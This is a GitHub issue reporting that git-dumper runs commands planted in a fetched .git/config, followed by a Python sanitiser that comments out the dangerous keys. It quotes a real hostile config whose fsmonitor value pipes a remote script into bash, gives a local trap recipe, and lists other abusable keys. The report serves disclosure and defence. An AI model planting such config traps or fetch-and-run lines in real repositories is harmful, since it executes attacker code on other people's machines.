Security risk - RCE in .git/config #42

ZanyMonk opened this issue Feb 26, 2024 · 1 comment

ZanyMonk commented Feb 26, 2024

I recently came across a weird .git/config file against which this tool is totally vulnerable.

[core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
        fsmonitor = "bash -c 'curl -s https://[redacted]/static/img/[redacted].js | bash'"
[user]
        email = [redacted]

The command set as the fsmonitor value gets executed when issuing several git commands, including the final git checkout . made by git-dumper to rebuild the worktree.

Here is a simple method to create such a git trap locally to test its behavior:

mkdir /tmp/evilgit
cd /tmp/evilgit
git init
cat >> .git/config <<EOF
        fsmonitor = "sh -c 'xcalc &' | echo 0"
EOF

# Trigger the trap
git checkout .

There are several other configuration variables that could be used to achieve similar results (sshCommand, askPass, editor, pager and there could be more).

Solve the problem

A way to protect ourselves from this kind of thing is to check the config file for dangerous configuration variables (which everyone should do manually anyways) and comment them automatically before running any git command.


arthaud commented Feb 26, 2024

Thanks for the report. This is indeed a known problem, as mentioned in the README.

Agreed with your proposal. An easy fix would be to comment out the .git/config before running any git command.
Feel free to submit a PR :)
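A sanitiser along the lines of the fix proposed in the report and accepted above, as an added example (not git-dumper's own code): it comments out any `key = value` line whose key is in the issue's list, in whatever section it appears, and also comments git's backslash-newline continuation lines so a multi-line value cannot leave part of a command live. The key list, the `neutralise_config` name and the sample config are constructed from this issue and the list is not exhaustive.

```python
"""Neutralise dangerous keys in a fetched .git/config before invoking git."""
import re
from pathlib import Path

# Keys named in the issue; git matches config keys case-insensitively and
# this list is not exhaustive (the reporter notes "there could be more").
DANGEROUS_KEYS = {"fsmonitor", "sshcommand", "askpass", "editor", "pager"}

# `name = value` or a bare `name` (boolean true); section headers "[...]"
# and comment lines starting with "#" or ";" do not match.
_KEY_RE = re.compile(r"^\s*([A-Za-z][A-Za-z0-9-]*)\s*(=|$)")


def _continues(line: str) -> bool:
    """Git strips a trailing backslash plus newline, so an odd number of
    trailing backslashes means the next line is still part of this value."""
    stripped = line.rstrip()
    return (len(stripped) - len(stripped.rstrip("\\"))) % 2 == 1


def neutralise_config(text: str) -> tuple[str, list[str]]:
    """Return (sanitised config text, lines that were commented out)."""
    out, disabled = [], []
    state = None  # None: fresh line; "bad"/"safe": continuation of a value
    for line in text.splitlines():
        if state is None:
            match = _KEY_RE.match(line)
            is_value = match is not None
            bad = is_value and match.group(1).lower() in DANGEROUS_KEYS
        else:
            is_value, bad = True, state == "bad"
        if bad:
            out.append("# " + line)  # git ignores lines starting with '#'
            disabled.append(line)
        else:
            out.append(line)
        state = ("bad" if bad else "safe") if is_value and _continues(line) else None
    return "\n".join(out) + "\n", disabled


def neutralise_config_file(path: Path) -> list[str]:
    """Rewrite the file in place and return the lines that were disabled."""
    sanitised, disabled = neutralise_config(path.read_text())
    if disabled:
        path.write_text(sanitised)
    return disabled


# Constructed sample modelled on the config quoted in the issue (hostname is a placeholder).
SAMPLE = """[core]
\trepositoryformatversion = 0
\tfsmonitor = "bash -c 'curl -s https://REDACTED.example/x.js | bash'"
\tsshCommand = "echo part-one \\
\tpart-two"
[user]
\temail = someone@example.invalid
"""
```

Running `neutralise_config(SAMPLE)` leaves `repositoryformatversion` and `email` untouched and comments the `fsmonitor` line plus both lines of the continued `sshCommand` value; a second pass over the result changes nothing.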
